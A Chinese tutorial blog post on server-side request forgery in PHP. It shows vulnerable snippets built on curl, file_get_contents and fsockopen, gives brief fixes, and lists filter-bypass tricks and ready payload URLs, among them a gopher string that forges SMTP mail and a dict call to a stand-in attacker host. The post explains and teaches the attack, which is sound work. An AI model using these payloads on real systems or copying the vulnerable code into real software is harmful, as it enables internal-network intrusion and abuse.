• PHP下的SSRF


    前言

    最近一段时间再找工作面试,然后hw也面试,就没时间写博客啥的,找工作还得面谈,前天刚从厦门回来,明天又要去泉州了。但是我发现面试好像都喜欢问ssrf,那么我就想着写一篇ssrf,然后看看有时间的话我顺便写下xxe这玩意儿。

    0x01、SSRF

    ssrf原理是啥?个人理解如下

    ssrf是服务端请求伪造,顾名思义,就是服务端有功能点发起请求,但是没有过滤用户输入的传参,从而被攻击者利用,对指定目标进行发起请求。而因为是服务端发起的请求,所以ssrf亦可以对内网中其他机器发起请求。
    

    在哪里可以挖掘呢?从指定URL地址获取网页文本内容,加载指定地址的图片,下载等。利用的就是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。

    1、漏洞的产生

    在PHP中的curl()file_get_contents()fsockopen() 等函数是几个主要产生ssrf漏洞的函数

    1) curl()

    <?php
    function curl($url){
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$url);
        #curl_setopt($ch,CUPLOPT_HEADER,1);
        curl_exec($ch);
        curl_close($ch);
    }
    $url = $_GET['url'];
    curl($url);
    ?>
    

    function 定义一个函数,叫做curl,有一个参数,叫$url
    curl_init() 初始化一个cURL会话后。将$url传入curl_setopt($ch,CURLOPT_URL,$url);

    (curl_setopt($ch, CURLOPT_HEADER, 1) 这边是设定返回信息信息,是否要返回响应信息头这里的话可以注释掉)

    注释后的:

    没注释的:

    然后通过 curl_exec 发起一个请求,curl_exec详细信息
    然后这就是一个函数,接下来再设置一个get传参为变量url,然后再把这个变量url代入前面所创建的那个 curl函数

    2)file_get_contents()

    <?php
    
    if(isset($_POST['url']))
    {
        $content=file_get_contents($_POST['url']);
        $filename='./images/'.rand().'.img';
        file_put_contents($filename,$content);
        echo $_POST['url'];
        $img="<img src="".$filename.""/>";
    
    }
    echo $img;
    ?>
    
    <?php
    $url = $_GET['url'];;
    echo file_get_contents($url);
    ?>
    

    file_get_content函数从用户指定的url获取内容,然后指定一个文件名进行保存,并展示给用户。file_put_content函数把一个字符串写入文件中。

    3) fsockopen()

    <?php
    $host=$_GET['url'];
    $fp = fsockopen("$host", 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)<br />
    ";
    } else {
        $out = "GET / HTTP/1.1
    ";
        $out .= "Host: $host
    ";
        $out .= "Connection: Close
    
    ";
        fwrite($fp, $out);
        while (!feof($fp)) {
            echo fgets($fp, 128);
        }
        fclose($fp);
    }?>
    

    fsockopen 函数实现对用户指定url数据的获取,该函数使用socket(端口)跟服务器建立tcp连接,传输数据。变量host为主机名,port为端口,errstr表示错误信息将以字符串的信息返回,30为时限

    注意

    1. 一般情况下PHP不会开启fopen的gopher wrapper
    2. file_get_contents的gopher协议不能URL编码
    3. file_get_contents关于Gopher的302跳转会出现bug,导致利用失败
    4. curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用
    5. curl_exec() //默认不跟踪跳转,
    6. file_get_contents() // file_get_contents支持 php://input协议
    

    0x02、利用方式

    2.协议
    (1)file: 在有回显的情况下,利用 file 协议可以读取任意内容
    (2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等

    http://test.org/ssrf.php?url=dict://127.0.0.1:6379/info  //查看reids相关配置
    
    如果ssrf.php中加上一行屏蔽回显的代码“curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);”,那么这种方式就失效了,和gopher一样,只能利用nc监听端口,反弹传输数据了。
    

    (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。可用于反弹shell
    4)http/s:探测内网主机存活

    0x03、修复方式

    1、过滤返回的信息,如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。

    2、统一错误信息,避免用户可以根据错误信息来判断远程服务器的端口状态。

    3、限制请求的端口,比如80,443,8080,8090。

    4、禁止不常用的协议,仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://等引起的问题

    5、使用DNS缓存或者Host白名单的方式。

    0x04、绕过方式

    1、利用[::]

    利用[::]绕过localhost
    http://[::]:80/  >>>  http://127.0.0.1
    

    2、利用@

    http://example.com@127.0.0.1
    

    3、利用短链接

    http://dwz.cn/11SMa  >>>  http://127.0.0.1
    

    4、修改类型

    修改"type=file"为"type=url"
    比如:
    上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF
    

    5、利用Enclosed alphanumerics

    利用Enclosed alphanumerics
    ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
    List:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ 
    ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
    

    6、利用句号

    127。0。0。1  >>>  127.0.0.1
    

    7、利用进制转换

    可以是十六进制,八进制等。
    115.239.210.26  >>>  16373751032
    首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
    然后把 73efd21a 这十六进制一起转换成8进制
    记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
    

    8、利用协议

    Dict://
    dict://<user-auth>@<host>:<port>/d:<word>
    ssrf.php?url=dict://attacker:11111/
    SFTP://
    ssrf.php?url=sftp://example.com:11111/
    TFTP://
    ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
    LDAP://
    ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
    Gopher://
    ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
    
  • 相关阅读:
    币值转换
    打印沙漏
    秋季学期总结
    在人生道路上对我影响最大一位老师
    自我介绍
    python笔记十五(面向对象及其特性)
    python笔记十四(高阶函数——map/reduce、filter、sorted)
    python笔记十三(高阶函数、装饰器)
    python笔记十二(匿名函数)
    Python笔记十一(迭代器)
  • 原文地址:https://www.cnblogs.com/0x7e/p/14463234.html
Copyright © 2020-2023  润新知